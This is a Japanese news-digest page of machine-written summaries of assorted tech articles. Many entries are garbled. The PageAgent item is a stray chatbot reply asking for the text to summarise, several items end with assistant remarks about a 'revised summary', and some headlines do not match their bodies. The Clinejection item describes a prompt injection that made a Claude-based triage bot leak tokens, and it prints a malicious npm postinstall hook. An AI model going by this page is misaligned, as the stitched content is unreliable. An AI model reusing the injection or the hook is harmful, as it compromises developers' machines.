日付別ニュース一覧

多数の管理者アカウントが侵害された後、ウィキペディアは読み取り専用モードになった。

## Japanese Translation: **概要:** 本書は、2026年2月20日から3月5日にかけて Wiki サービスに影響を与えた一連の技術的インシデントを記録しています。 - **2月20日:** 19:28 UTC に問題が確認され、19:44 UTC に修正が適用されました。23:33 UTC に監視を再開しました。 - **2月25日:** 16:40 UTC に調査が開始され、17:24 UTC に解決しました。 - **2月26日:** 16:25 UTC に修正で問題が解消され、16:58 UTC に監視を開始しました。 - **3月3日:** 10:09 UTC にデータベースサーバーの問題が検知され、10:24 UTC に修正が適用されました。10:17 UTC に監視更新が行われました。 - **3月5日:** 16:11 UTC に問題が確認され、17:09 UTC に初期修正（読み書き復旧）が実施されました。さらに編集は17:36 UTC の追加修正まで無効のままでした。18:36 UTC に監視を継続し更新しました。 3月4日、2月1–2、2月27–28、2月22–24、または2月21日はインシデントが報告されていません。 インシデントは運用上の問題、性能低下、一部停止、大規模停止、およびメンテナンスカテゴリにわたります（ただし各イベントに対する具体的なカテゴリは割り当てられていません）。 すべての修正後、チームは安定性を確認するために継続的監視を実施し、完全回復を宣言しました。ユーザーは一時的な読み取り専用アクセスと編集制限を経験し、継続的な Wiki 利用が必要な企業や教育グループの協力に影響を与える可能性があります。新たな症状が出現した場合に備えて、引き続き観測が行われることが示唆されています。 *この拡張版がご要望に合致する場合は、元の概要を置き換えることができます。*

**「ブランドの時代」**

## 日本語訳: **要約：** スイスの時計業界は、1970年代に起こったクォーツ危機によって軌道を変えました。この危機は日本企業の競争とフランス・米ドル為替レートの急騰が引き金となり、ユニット販売数は1970年代初頭から1980年代初頭にかけて約3分の2減少しました。その結果、多くのメーカーは破綻または買収を余儀なくされました。残存した数社は純粋な技術的精密さから**ブランド主導のラグジュアリー**へとシフトしました。 視覚的マイルストーンがこの転換を確固たるものにしました：パテック・フィリップの1968年「ゴールデン・エリプス」ケース、オーデム・ピゲの1972年ロイヤルオーク（ジェラルド・ゲンタ設計）、そして1976年のノーティラスはすべて技術的洗練よりも瞬時に認識できるデザインを強調しました。1984年にはパテックの広告代理店長レネ・ビッテルが「ホブナイル・カラトラバ」（3919）を提唱し、手巻き機構と独特な模様が投資銀行家の注目を集め、1987年までに売上を急増させました。 メカニカル時計は**高級アクセサリー**として再登場しました。大きさと視覚的インパクトが男性の「ユーピー」（若手社会人）に富を披露するために理想的だったためです。ブランド時代は現在、オーバーサイズで独特な形状のケース、人工的希少性、および二次市場（例：パテックの時計買い戻し）の積極的管理によって定義されます。 主要ブランドは階層化された製品ラインを割り当てる持株会社に統合されました。独立ブティックは、パテック・オーデム・ピゲ、ロレックスなどの数少ないフラッグシップハウスでのみ存続しています。業界がステータスシンボルに焦点を当てることで、メーカーによって管理される**資産バブルに似たビジネスモデル**が生まれました。 **教訓：** ブランド力は収益性を推進しますが、過度の依存はイノベーションを抑制するリスクがあります。次の「黄金時代」は、名声を売るだけでなく、本当に興味深い問題に取り組むことで生まれる可能性が高いです。

**Linuxにおけるハードウェア・ホットプラグイベント ― 詳細解説**

## Japanese Translation: **概要：** Libusb の Linux ホットプラグシステムは、`linux_netlink.c` と `linux_udev.c` という 2 つのバックエンドに依存しています。デフォルトでは `--with-udev=yes` が設定されており、udev を無効にするとプレーンな netlink バックエンドが使用されます。 カーネルデバイスイベントは Netlink プロトコル 15（`NETLINK_KOBJECT_UEVENT`）を介して到達し、ヌル終端文字列として `add@/devices/...` のようなアクション行から始まり、`ACTION=add`、`SUBSYSTEM=usb` などのキー／バリュー ペアが続きます。udev はこれらのメッセージを受信し解析して、カスタムパケット形式でマルチキャストグループ 2（`MONITOR_GROUP_UDEV`）に再送信します。 udev パケットは `"libudev"` というマジック文字列から始まり、ビッグエンディアンのバージョンワード `0xfeedcafe` を持ち、次にネイティブエンディアンで格納された複数フィールド（`header_sz`、`properties_off`、`properties_len`、`subsystem_hash`、`devtype_hash`、`tag_bloom_hi`、`tag_bloom_lo`）が続きます。ハッシュは `SUBSYSTEM=` と `DEVTYPE=` の値に対して MurmurHash2 を用いて計算され、2 つの Bloom フィルタワードは `TAGS=` キーから導出されたビットをエンコードします。その後パケットには元のキー／バリュー文字列と、`SO_PASSCRED` 経由で送られる Unix 認証情報（pid/uid/gid）が含まれます。カーネルメッセージはゼロ認証情報を持つため、libudev は有効な認証情報がないパケットを拒否します。 プロトコルバージョンは固定で `0xfeedcafe` となっており、後方互換性や前方互換性に関する保証は文書化されていません。そのため、パケットレイアウト、フィルタリングロジック、または認証情報処理の変更は libusb と udev の両方で協調して更新を行う必要があり、ホットプラグイベントに依存するアプリケーションのデバイス検出、安定性、セキュリティに影響を与える可能性があります。

**柑橘系統図の三元プロット**

## Japanese Translation: **メインメッセージ:** ほぼすべての栽培されたシトラス果実は、3つの祖先種—ミカン（*Citrus reticulata*）、パムーロ（*Citrus maxima*）、そしてシトロン（*Citrus medica*）のハイブリッドであり、現代の育種によりほとんどの品種が甘みが強くミカン成分が豊富なプロファイルへと推進されてきました。 **証拠:** 遺伝子解析では、元の3種が三角形プロットの頂点に配置され、それぞれの間の距離は果実のゲノム内で各種が占める割合を示します。人為的選択により遺伝子混合が増幅され、孤立した枝ではなく重なり合う再結合クラスターが生成されます。 **歴史的背景:** 3つの主要種は、5百万年以上前の気候変動イベントで分岐し、その結果、キムクワットやカッファイルームなどへの進化放散を引き起こしました。シトラスの家畜化はアジアで始まり、オーストロネシアン航路を経て地中海へ広がり、そこでさらに選択が行われて現在馴染み深い市場グループが形成されました。 **チャート特性:** 三角形プロットは年代順ではなく、苦味/甘味の特徴クラスター、歴史的偶然、および隠れた方向性を視覚的に示します。追加の原種（例：サムヤオ）が* Citrus × citrus* のようなハイブリッドを通じてゲノムプールに入り込み、単純な3角形モデルを複雑化しています。キーレモンなどのハイブリッド例は、厳密な3種関係を曖昧にします。 **将来展望:** プロット内の混雑した領域は隠れた方向性を示し、現在スーパーマーケットで支配的な品種がなぜ選ばれるかを説明しています。これは今後も甘みが強くミカン成分が豊富な果実への育種が継続されることを意味し、この傾向は人気のあるシトラスタイプの範囲を狭め、供給チェーンや品種開発戦略、そしてブリーダーに利用可能な遺伝的多様性に影響を与える可能性があります。 **参考文献:** Wu et al. (2018) *Nature* 554:311–316; Langgut (2017) *HortScience* 52:814–822; Velasco & Licciardello (2014) *Nat. Biotechnol.* 32:640–642; Curk et al. (2016) *Ann. Bot.*; Barkley et al. (2006) *Genome*; Ollitrault et al. (2012) *Ann. Bot.*; Curk et al. (2015) *Mol. Ecol.*

良いソフトウェアは、適切なタイミングで停止することがわかります。

## Japanese Translation: （欠落していた点を補いつつ、明確さを保つために）** --- ### 要約 従来の `ls` コマンドは、AI‑Powered Directory Intelligence™ システムへ進化したことを告げる ASCII アートの通知を表示します。新しいユーティリティ **`als`** が導入され、単にファイルを一覧表示するだけでなく、予測とランキングを行います。この通知は「**The ls Team (now part of ALS)**」によって署名されています。 初めの30日間はレガシー `ls` バイナリが機能し続けますが、その後は非推奨となり、アップデートは停止し、ディレクトリ認識機能も無効になります。ユーザーは `$ als --trial` で無料の30日トライアルを開始できます。本記事では、この変更を**段階的な移行**として位置づけ、長年にわたる Unix 標準を最終的に置き換えるものとしています。 この記事は、このシフトを目的・範囲・製品ビジョンというソフトウェア設計の原則と対比し、37Signals の *Rework* と *Getting Real* を引用しています。制約を受け入れ、不要な機能要求を無視し、早期リリースを行い、コアインターフェイスに焦点を当て、「いいえ」をデフォルトに設定し、必要なものだけを構築するという教訓を強調しています。著者は、ブランドの新規性のために事実上の標準を犠牲にするような急激な変更には警戒すべきと警告しています。 --- このバージョンでは、元のリストから重要なポイントを全て保持しつつ、移行の性質を明確化し、署名の詳細を追加しています。

GitHub のイシュー：開発マシンが4 Kで侵害されました

## 日本語訳: ## 要約 npmパッケージ **cline@2.3.0** は、2026年2月17日に `package.json` の post‑install フックに1行を挿入することで侵害されました。 ```json "postinstall": "npm install -g openclaw@latest" ``` CLI バイナリは以前のリリースとバイト単位で同一でしたが、この変更により約 **4,000人の開発者** がインストーラを実行し、悪意ある AI エージェント **OpenClaw** をグローバルにインストールしました。これにより OpenClaw は完全なシステムアクセス権を取得しました。 攻撃チェーンは Snyk によって **「Clinejection」** と名付けられ、GitHub のイシュータイトルでのプロンプト注入によって引き起こされました。Cline の Anthropic Claude ベースの triage bot は、タイポスキャットされたフォーク（`glthub-actions/cline`）から `npm install` を実行し、*Cacheract* で GitHub Actions キャッシュを汚染して悪意あるアーティファクトで溢れさせました。このチェーンは認証情報（`NPM_RELEASE_TOKEN`, `VSCE_PAT`, `OVSX_PAT`）を盗み取り、*cline@2.3.0* の悪意ある公開を可能にしました。 セキュリティ研究者 Adnan Khan は 2026年1月1日に脆弱性を報告し、Cline は 2 月 9 日の公表後 30 分以内に AI‑triage ワークフローをパッチしましたが、トークンローテーションエラーにより盗まれた npm トークンは 2 月 11 日まで有効でした。侵害された *cline* パッケージは公開から約8時間生存し、その後 StepSecurity が検知（≈14分）しました。 OpenClaw は `~/.openclaw/` から認証情報を読み取り、Gateway API を介してシェルコマンドを実行し、永続的なシステムデーモンとして自らをインストールできます。 **ポストモーテムの修復策** は次のとおりです： - 認証情報ワークフローで GitHub Actions キャッシュの使用を排除する。 - npm 公開に OIDC 出所証明（provenance attestations）を採用する。 - トークンローテーションの検証を追加する。 - 公式脆弱性開示 SLA を確立する。 - 独立した CI/CD セキュリティ監査を委託する。

OpenTitan 本番環境への配備

## Japanese Translation: > **OpenTitan® シリコンは現在、商業利用可能な Chromebook（Nuvoton 製造）で出荷されており、間もなく Google のデータセンターに導入される予定です。** > 最初のパーツは低コストで標準化されたハードウェア Root of Trust (RoT) であり、SLH‑DSA を使用したポスト量子暗号（PQC）セキュアブートをサポートする最初の商用オープンソース設計です。設計検証では、40,000 回以上の夜間テストにより 90 % 超の機能およびコードカバレッジが達成され、回帰は迅速に解決されます。 > 所有権移転により、ユーザーはベンダー共署名なしで更新スケジュールを管理できます。本プロジェクトは、Google と協力し、275 名以上の貢献者から 29,200 件以上のコミットがある成長中のオープンソースコミュニティと提携している独立非営利団体 lowRISC C.I.C. によって維持されています。OpenTitan のメソッドは、データセンター SoC 用の RoT ブロックである Caliptra など他の設計にも影響を与えています。 > 第2世代パーツは、セキュアブートと証明書発行用に格子型 PQC（ML‑DSA, ML‑KEM）をサポートするよう開発中です。Google のデータセンターでの導入が進行中で、今年後半に完了予定です。ドキュメントおよびオンボーディング資料は開発者採用を円滑化するため優先されており、lowRISC はオープンソースシリコンエコシステムをさらに拡大するための新しいメンバーシップ階層を計画しています。 *改訂された要約は、主要なポイントすべてを網羅し、余分な推測を排除し、明確で簡潔な主旨を提示します。*

Structured AI（YC F25）では、現在採用活動を行っております。

## Japanese Translation: ## Summary Structured は、HVAC、建築基準、および MEP コーディネーションを支援する自律型 AI エージェントへとエンジニアリング知能を変革するために創業チームのメカニカルデザインエンジニアを募集しています。役割は、機械論理と業界標準を AI 用パターンに符号化し、エンジニアと協力して毎週「PE レベル」の機能を立ち上げ、企業顧客向けの AI 生成レポートの技術的デリバリーを主導し、トップティア MEP フィームとのカスタマーディスカバリーに従事してモデル反復のためのエッジケースを特定することです。理想的な候補者は、建設または MEP フィームで 2 年以上の経験、QA/QC ピアレビューの実績、システム思考スキル、およびワークフロー自動化のハッカーマインドセット（多分野調整と AI/ML ツールへの追加クレジット）を備えている必要があります。Structured は全日制報酬として $80,000–$85,000 を提供し、CPT の適格性もあり、競争力のある時間単価またはプロジェクト料金でコンサルティングオプションも用意しています。 Structured のミッションは、手動図面レビューから生じる無駄を排除することです。これには、機械・電気・構造・土木図面全般にわたって高精度の QA/QC、コードコンプライアンス、および設計一貫性チェックを構築し、建設および MEP フィームで培った経験を活かします。会社は毎週プロフェッショナルエンジニアリング基準に適合する機能をリリースし、大規模データセットからの自動化されたチェックでシステムをスケールさせ、最終的には設計エンジニア向けの頼れるプラットフォームへと進化します。将来的には AI コーデザイナーと自律ワークフローを提供し、機械および MEP エンジニアがより高速で正確な QA/QC を実現し、企業の手動レビュー時間を短縮し、業界全体を品質と効率を高める AI 主導型設計ツールへとシフトさせる可能性があります。

Show HN: Jido 2.0, Elixir Agent Framework → Show HN：Jido 2.0、Elixir エージェント・フレームワーク

## Japanese Translation: > **Jido 2.0** – BEAMファーストのエージェントフレームワークを更新したものが、Hexにリリースされました。2024年にBotHiveとして始まったこのプロジェクトは、AIブームの後で書き直され、Jido 1.0 の過剰設計に対処するため、より軽量で API‑centric なバージョン 2.0 が生まれました。 > コアアーキテクチャでは、エージェントを単なるデータ構造として扱い、`cmd/2` 関数が副作用用の指示（ディレクティブ）を生成します。各エージェントは監督付き GenServer (`Jido.AgentServer`) 内で動作し、シグナルルーティングと親子階層を備えています。 > 組み込み戦略には **Direct**（逐次処理）と **FSM**（状態機械）があり、さらに **ReAct** や **Chain‑of‑Thought** のようなプラグイン戦略が LLM 呼び出しを追加します。フレームワークは複数のパッケージを提供しています：`jido_action` （検証済みアクション契約、25 以上のプリビルトツール、DAG プランナー）と `jido_signal`（CloudEvents ベースのメッセージング、Trie ルーター、pub/sub）。 > Jido の AI レイヤーは ReAct、Chain‑of‑Thought、Tree‑of‑Thoughts、Graph‑of‑Thoughts、TRM、Adaptive の六つの推論戦略を提供し、**ReqLLM** と統合しています。ReqLLM はストリーミング優先でマルチプロバイダークライアントであり、現在 11 社のプロバイダーと 665 以上のモデル（バージョン 1.6）をサポートします。 > エコシステムは拡大中です：ビルダーがコード補助ツール、ワークフローオーケストレーター、リサーチエージェントなどを作成しており、今後のパッケージではブラウザ自動化、メモリシステム、評価ハーネス、MCP 統合が対象になります。Ash Framework の完全サポート（`ash_jido`）により、ユーザーは AI 呼び出し可能なツールをポリシー実行と型安全性で定義でき、`ash_ai` は現在 ReqLLM を活用しています。 > 詳細については、ドキュメント（[jido.run/docs/getting-started](https://jido.run/docs/getting-started)）、エコシステム概要（[jido.run/ecosystem](https://jido.run/ecosystem)）、GitHub リポジトリ（[github.com/agentjido](https://github.com/agentjido)）を参照し、Discord（[jido.run/discord](https://jido.run/discord)）でコミュニティに参加してください。

プロトン・メールは、匿名だった「ストップ・コップ・シティ」抗議者の身元を明らかにするため、FBI を支援しました。

## Japanese Translation: > プロトン・メールは、ストップ・コプ・シティの電子メールアカウントから支払情報をスイス当局に渡し、その後FBIへ転送したと非難されています。404 Mediaが検証した裁判所の訴状はこのデータ転送を確認しており、プロトンは自社サービスが完全にスイスのプライバシー法に準拠していること、そしてメッセージはエンドツーエンド暗号化で保護されている（つまり送信者と受信者だけが読むことができる）と主張しています。問題となっていたアカウントは、「Defend the Atlanta Forest」グループおよび「Stop Cop City」運動に関連しており、これらの組織はインタ―・クリーク公園近くの計画中の警察訓練センターへの抗議活動で、放火や破壊行為、ドキシング（個人情報公開）を疑われて調査対象となっていました。抗議では森にキャンプを設けたり、訴訟を起こしたりしていましたが、60名以上の参加者に対する告発はすでに取り下げられています。

リモートで暗号化されたハードディスクをロック解除する

## Japanese Translation: この記事では、Arch Linux システムのブートパーティションを暗号化し、ルートファイルシステムが復号される前にネットワーク経由でアクセス・ロック解除できるように設定する方法を説明しています。 1. **必要なパッケージのインストール**：`pacman -S dropbear` と AUR パッケージ `mkinitcpio-systemd-extras`、`mkinitcpio-tailscale` をインストールします。 2. **mkinitcpio の設定**：既存のフックに加えて、`sd-network tailscale sd-dropbear` を `/etc/mkinitcpio.conf` に追加し、`SD_NETWORK_CONFIG=/etc/systemd/network-initramfs` を設定します。 3. **initramfs で Tailscale をセットアップ**：`setup-initcpio-tailscale` を実行し、Web コンソールでマシンに `tag:initrd` タグを付与し、キーの有効期限を無効化します。 4. **Dropbear の設定**：`SD_DROPBEAR_COMMAND="systemd-tty-ask-password-agent"` を設定し、公開鍵を `/root/.ssh/authorized_keys` にコピーしてからホストキーを生成します（`dropbearkey -t ed25519 -f /etc/dropbear/dropbear_ed25519_host_key`）。 5. **早期ネットワークの有効化**：DHCP を使用した `/etc/systemd/network-initramfs/10-wired.network` を作成し、initramfs を再構築します（`mkinitcpio -P`）。 6. **ブートローダーエントリの調整**：systemd-boot で `rootflags=subvol=/@,x-systemd.device-timeout=0` を追加し、復号プロンプトが無期限に待機するようにします。 7. **再起動してロック解除**：再起動後、Dropbear を介して `<hostname>-initrd` に SSH 接続し、`systemd-tty-ask-password-agent` で暗号化ディスクのパスフレーズを入力します。 このガイドでは、物理アクセスが不可能なヘッドレスサーバーや IoT デバイスに最適であることを強調し、さらに Tailscale の ACL やキー有効期限の無効化などの追加セキュリティ対策を提案しています。

**Launch HN:** **Vela（YC W26）– 複雑なスケジューリングを支援するAI**

## 日本語訳： --- ### Vela – AI駆動のマルチパーティー・マルチチャネルスケジューリング Velaは、メール、SMS、WhatsApp、Slack、電話、および応募者追跡システム（ATS）など数十のコミュニケーションチャネルにわたる複雑なスケジューリングを自動化するAIエージェントプラットフォームです。文脈ヒントを読み取り、カレンダーを確認し、最適な時間を提案し、フォローアップし、自動的に再予約を行うことで、手作業での調整の往復を排除します。 **主要機能とデータサイエンス** - Velaは「次の金曜日」「午後3時に明日」などの時間的自然言語表現から構造化された制約を抽出し、リアルタイムのカレンダー状態と照合して解決します。 - 役割別応答遅延、人口統計別チャネル好み、フォローアップタイミング曲線、および提案すべき時間オプション数などを捉える行動データセットを構築し、これらのデータがスケジューリング戦略を継続的に洗練します。 - プラットフォームはチャネル間でのアイデンティティ統合（例：メールアドレスと電話番号またはニックネームの照合）に取り組み、共有デバイスから返信が来た場合にはコンテキストをマージします。 **初期トラクション** Gobhanu と Saatvik の兄弟は YC Winter ’26 で Vela を立ち上げました。最初のクライアント（人材派遣会社）はわずか10分でオンボードし、現在では数百件の候補者-クライアント面談をほぼ手間なく管理しています。ケーススタディは `https://tryvela.ai/case-studies/` で閲覧でき、デモ動画は YouTube にあります。 **現状の焦点と将来のニーズ** Vela は既に有料エンタープライズ顧客向けに稼働していますが、タイムゾーンの衝突、直前キャンセル、連鎖的な再予約などのエッジケースはまだ発生します。創業者はマルチエージェント調整、クロスチャネル会話型AI、および実世界制約満足度に関する専門家からのフィードバックを積極的に求めており、システムの改善に取り組んでいます。 **ユーザーと企業へのインパクト** - **ユーザー**：メールスレッドが減少し、自動生成されたZoomリンク、手間のかからない再調整。 - **企業**：手作業労力の削減、候補者体験の向上、予約戦略を洗練するデータ駆動型洞察。 ---

**タイトル:** 「ダッシュカム映像をパノラマ画像に変換する」

## Japanese Translation: --- ## Summary この記事では、Garmin 47ダッシュカムのMP4映像をPanoramaxで使用できるジオタグ付きJPEG画像に変換する完全自動化されたLinuxワークフローについて説明しています。 以下の4つの具体的なステップを示しています。 1. **GPSデータを抽出** `exiftool -ee3 <video>.MP4` を使用し、カスタムフォーマットファイル（`gps_format.fmt`）で緯度・経度とISO 8601形式の日時を出力します。 2. **等間隔点を補間** 線形スケールで緯度/経度差を変換し（約0.000009°／メートル）、緯度に応じて経度をコサインで調整、ピタゴラスの定理で距離を推定して約3 m間隔のタイムスタンプリストを生成します。 3. **そのタイムスタンプでフレームを取得** `ffmpeg -ss <time> -i <video>.MP4 -q:v 3 -frames:v 1 …` を実行し、画像を連番（例：`4567‑0025.jpg`）で保存します。 4. **GPS／時間メタデータを埋め込む** ExifTool で各JPEGに必要なキー（`gpslatitude`、`gpslongitude`、`gpslatituderef`、`gpslongituderef`、`datetimeoriginal`）とオプションタグ（`subsectimeoriginal`、`author`、`make`、`model`）を設定し、`-overwrite_original` を使って重複を防ぎつつ `2>/dev/null` で出力を抑制します。 同一秒に撮影された画像の正しい順序付けには `SubSecTimeOriginal` タグが不可欠です。 著者はスクリプトが「バグ付き」だと述べつつ、部分的にコメント済みで利用可能であることを示しています。 将来の記事では、GPSサンプルの欠落、重複測定、Null Island の処理、多数のクリップを再帰的に処理するケースなどを扱う予定です。 このワークフローは、Mapillary が生映像を受け入れつつ、Panoramax が事前処理済みでジオタグ付き画像を要求するというギャップを埋め、Linux システム上でダッシュカム映像を効率的にコンプライアンス JPEG に変換できるようにします。

**政府はターゲット広告であなたの位置情報を追跡しています**

## Japanese Translation: 記事は、米国連邦機関がリアルタイム入札（RTB）広告データ―特に電話位置情報と広告ID情報―を監視ツールとして活用していることを警告しています。CBPの文書は、市販されているRTBマーケティングデータの利用を示し、2つの情報源が引用されています：アプリ内のソフトウェア開発キット（SDK）とRTBオークションです。ICEはWeblocを購入し、Apple/Google広告IDを介して数百万件の電話位置情報を収集します。また、ICE、CBP、FBIなどの機関は、Venntel のような企業から仲介された位置データを購入し、移民やその他のグループをターゲットにしています。 RTB は入札ストリームデータ―ユニーク広告ID、GPS座標、IP アドレス、デバイス情報、推定興味、人口統計など―を、各広告スペースがオークションされるたびに数千の広告主へ公開します。FTC の調査によれば、RTB を通じて収集されたデータの 60 % 超はこうしたストリームから来ており、10億人以上の情報が関与し、オークションに参加するすべての者が入札ストリームデータを受け取ることが確認されています。 個人向けの実践的な対策としては、モバイル広告ID（Apple/Google）を無効化し、アプリへの位置情報権限を制限することがあります。広告テック企業は、入札リクエストで正確な GPS データの使用を停止し、ターゲティングを粗い場所に限定し、デフォルトで広告ID を削除または無効化することを検討すべきです。 立法者には、行動広告ターゲティングを禁止し、機密位置情報のワラントレス購入を許可する「データブローカーの抜け穴」を閉じる連邦プライバシー法の制定が求められています。モンタナ州の 2023 年法案とロン・ワイデン上院議員による 4 番目の修正条項「販売されない」法（2024 年に署名）など、最近の立法試みはこうした監視を抑制する方向で進められています。 無対策の場合、個人は広告ID を無効化またはアプリの位置情報権限を制限しない限り、増大する監視に直面します。業界はデータ収集慣行を変更せざるを得ず、オンライン広告の構造が変わる可能性があります。

**GLiNER2：統一スキーマベース情報抽出**

## Japanese Translation: ```markdown ## Summary: GLiNER2は、205 Mパラメータのコンパクトで統一されたモデルであり、名前付きエンティティ認識（Named Entity Recognition）、テキスト分類（Text Classification）、構造化データ抽出（Structured Data Extraction）および関係抽出（Relation Extraction）をすべて1回の前方パスで実行できます。GPUや外部APIに依存せず、CPU上で効率的に動作します。より大きなワークロードには340 Mの「fastino/gliner2-large-v1」バリアントが利用可能であり、さらに別途1Bモデル（GLiNER XL）はクラウドAPI経由でアクセスできます。 典型的な使用方法は次のとおりです： ```python extractor = GLiNER2.from_pretrained("fastino/gliner2-base-v1") entities = extractor.extract_entities(text, ["company","person","product","location"]) ``` モデルはオプションで信頼度スコア、文字列範囲データを出力し、多ラベル分類の閾値もサポートします。構造化抽出はJSONスキーマ構文（`field::type::description`）によって駆動され、製品や金融取引などの複雑なエンティティを解析できます。関係抽出では方向付きタプル（例：`works_for`、`located_in`）が返され、説明、信頼度、および範囲情報も付随します。 バッチ機能（`batch_extract_entities`、`batch_extract_relations`）により、多数のドキュメントに対して効率的な推論が可能です。トレーニングパイプラインはJSONLデータセットまたはLoRAアダプターを使用したドメイン適応による完全なファインチューニングをサポートします。RegexValidatorを添付することで、メールアドレス、URL、電話番号などの抽出フィールドをカスタム正規表現ルールでフィルタリングできます。 GLiNER2はApache License 2.0の下でリリースされ、EMNLP‑2025論文に記載されています。そのシングルパスかつCPUフレンドリーな設計は、金融・eコマース・エンタープライズ検索など、費用対効果の高いNLPパイプラインにとって魅力的です。 ```

**身体を動かそう**

## Japanese Translation: > 記事は、複数の建物と数百人の従業員を抱える企業で実施された、内部・外部・フィッシング・物理的側面すべてを網羅した1週間のフルスタックペネトレーションテストについて説明しています。 > > オンサイトフェーズでは、テスターたちは日常的なツール（ロックピック、ドライバー、圧縮空気缶、編み針フック、プラスチックカードなど）を使用して、多数の施錠ポイントを突破しました。具体例としては、オフィスのドア、タブレット制御の入口、受付に置かれた約20秒でピッキング可能なシュレッダー・ビン（給与データが入っていた）、ガラス製のディレクター室のロックを約5秒で開けるなどがあります。チームはまた、昼食時に警報や警備員の介入を招かずにシュレッダー・ビンを施錠位置から外し、サーバールームへの侵入も試みました（10分間のロックピッキング後、掃除婦に接近したが拒否された）。さらに、監視カメラ前で市旗を盗むという意図的な「捕まる瞬間」を演出しました。 > > 訪問者には会議室への入場のみ許可するバッジが発行されましたが、テスターは両建物の警備員とバッジチェックポイントを突破しました。ビジネスカードはディレクター室やアーカイブなど高価値な場所に置かれ、スタッフとの不適切な会話を引き起こし、見逃されがちな脆弱性を浮き彫りにしました。顧客は予期せぬ反応を示し、テストを知っていたのは5人だけであると指摘しました（内部セキュリティ意識が低いことを示唆）。著者はこれらのギャップに対処するため、今後も同様の物理的ペネトレーションテストを繰り返す計画です。 この改訂要約は主要なポイントをすべて網羅し、不必要な推測を避け、読者にとって明確で簡潔な物語を提示しています。

脳データから視覚知覚を再構築するためのデータセット

## 日本語訳： > このガイドは、脳活動から視覚刺激を再構築するのに適した fMRI データセットをまとめており、神経画像解析の専門知識がない AI/ML 研究者の参考資料となります。 > 再構築はデコードや識別とは異なり、未見のオープンセット刺激へ一般化する必要があるため、適切なデータセットは厳格な基準を満たす必要があります：独立した学習–テスト分割、多様な刺激カバレッジ、十分な視野範囲、細かいボクセル解像度（≤ 3 mm³）、注視点監視、SNR を確保するための十分な繰り返し回数、複数被験者、オープンアクセス/著作権遵守、および空間スムージングが行われていないこと。 > 文書では主要な画像刺激データセットを列挙しています―Kay ら（1750/120 画像、2 被験者、20° 視野、2 mm³ ボクセル）、BRAINS（288/72 手書き文字、2 被験者、約9° 視野、2 mm³ ボクセル）、Miyawaki ら（440 訓練、10×10 ピクセルパターン、2 被験者、約12° 視野、3 mm³ ボクセル）、BOLD5000（≈5200 自然画像、4 被験者、4.6° 視野、2 mm³ ボクセル）、Generic Object Decoding（1200 ImageNet オブジェクト、5 被験者、12° 視野、3 mm³ ボクセル）、Natural Scenes Dataset（≈73k MS‑COCO 画像、8 被験者、7 T スキャナ、1.8 mm³ ボクセル、8.4° 視野）、THINGS‑fMRI（8640 自然オブジェクト、3 被験者、10° 視野、2 mm³ ボクセル）、cNeuromod‑THINGS（≈4320 画像、4 被験者、約2 mm³ ボクセル）。 > ハイライトされたビデオ刺激データセットには、Nishimoto ら（≈7200 訓練タイムポイント、540 テスト；3 被験者；20° 視野；2×2×2.5 mm³ ボクセル；TR = 1 s）、Doctor Who（30 エピソード、約120k ボリューム、1 被験者、20° 視野、2.4 mm³ ボクセル、TR = 700 ms）、cNeuroMod ビデオ（Friends & movies；6 被験者；10–12 s TR；10° 視野；約2 mm³ ボクセル；注視点なし）。 > 要約ではまた、fMRI BOLD 応答は神経活動の 4〜6 秒後にピークし、約10〜12 秒で基線に戻ることも指摘しています。そのため、高速提示時の時間的重なりをモデル化する必要があります（静止画像の場合は GLM、ビデオの場合はより複雑な手法）。 この改訂版はすべての主要ポイントを反映し、元文に直接含まれていない推測的な将来作業の記述を除外し、曖昧さを排した明瞭性を保っています。

**Show HN:** *PageAgent* – ウェブアプリ内に埋め込まれた GUI エージェント

## Japanese Translation: **概要：** 明確で簡潔な要約を作成するお手伝いができます！ まず、まとめてほしい記事や主なポイントを共有してください。内容を受け取ったら、最も重要な情報を先に示し、技術用語は簡潔かつ理解しやすく保ちつつ、120〜200語のリキャップを作成します。 **概要スケルトン** （まとめてほしい骨格またはテキストをご提供ください。）

**牢獄へ侵入した男**

グレッグ・クロアハートマンが主要なLinux LTSカーネルのサポート期間を延長する --- *Greg Kroah‑Hartman Stretches Support Periods for Key Linux LTS Kernels* → 「グレッグ・クロアハートマンが主要なLinux LTSカーネルのサポート期間を延長する」

## Japanese Translation: Greg Kroah‑Hartman、Linux カーネルの安定版および LTS ブランチのメンテナは、主要ユーザーや同僚メンテナとの協議を経て、一部の LTS カーネルのエンド・オブ・ライフ（EOL）日付が延長されたことを発表しました。更新スケジュール（表に示される）は、6.12 と 6.18 のリリースのみを December 2026/December 2027 から December 2028 に移動し、その他の LTS カーネル（5.10、5.15、6.6）は変更なしです。 この決定は固定されたタイムテーブルではなく、実際の採用パターンを反映しています。エンタープライズディストリビューションは公式 EOL を大幅に超えてカーネルをサポートし続けています：RHEL は 10 年ライフサイクルを提供し、SUSE SLES 16 は最大 16 年までサポート可能であり、Ubuntu LTS リリースは 15 年稼働することがあります。ディストリビューションが EOL に達した後でも、多くの企業は TuxCare のようなサードパーティパッチサービスを利用してシステムを維持します。 カーネル寿命の延長により、大規模サーバーフリートのメンテナンスコストが削減され、アップグレードの混乱が低減し、既存ディストリビューションの継続利用が促進されると期待されています。この動きは他のベンダーにも長期サポートや強化されたパッチ管理ソリューションを提供するよう促す可能性があり、安定で長期的な Linux 環境に依存する企業にとって予算編成と運用計画を容易にします。 （記事はジャーナリスト Christine Hall（@BrideOfLinux）による執筆です。）

エチオピアは、デジタルIDプロジェクトに対し、世界銀行から3億5000万米ドルの資金を受け取っています。

## Japanese Translation: 世界銀行はエチオピアのデジタルアイデンティティプログラム「Fayda」のために3億5,000万ドルの資金パッケージを承認しました。この資金は主に「Digital ID for Inclusion and Services」プロジェクトの一環として提供され、国際開発協会からの5,000万ドルの助成金がホストコミュニティと難民を支援するために含まれています。公式な配分は以下の通りです：インクルーシブ発行用2億1,400万ドル、技術インフラ用6,800万ドル、建設インフラ用2,100万ドル、サービス提供用3,500万ドル、およびプロジェクト管理用1,200万ドル。 Faydaは2022年に開始され、パイロットフェーズで350万人が登録されました。このプログラムは2024年までに完全に展開される予定です。エチオピアの銀行は、その年からすべての金融取引においてFaydaを主要な身分証明手段として必要とします。Faydaのエチオピア執行ディレクターであるヨダヘ・ゼミカエル氏は、世界銀行による資金配布がIDプロジェクト実施に不可欠だと述べました。 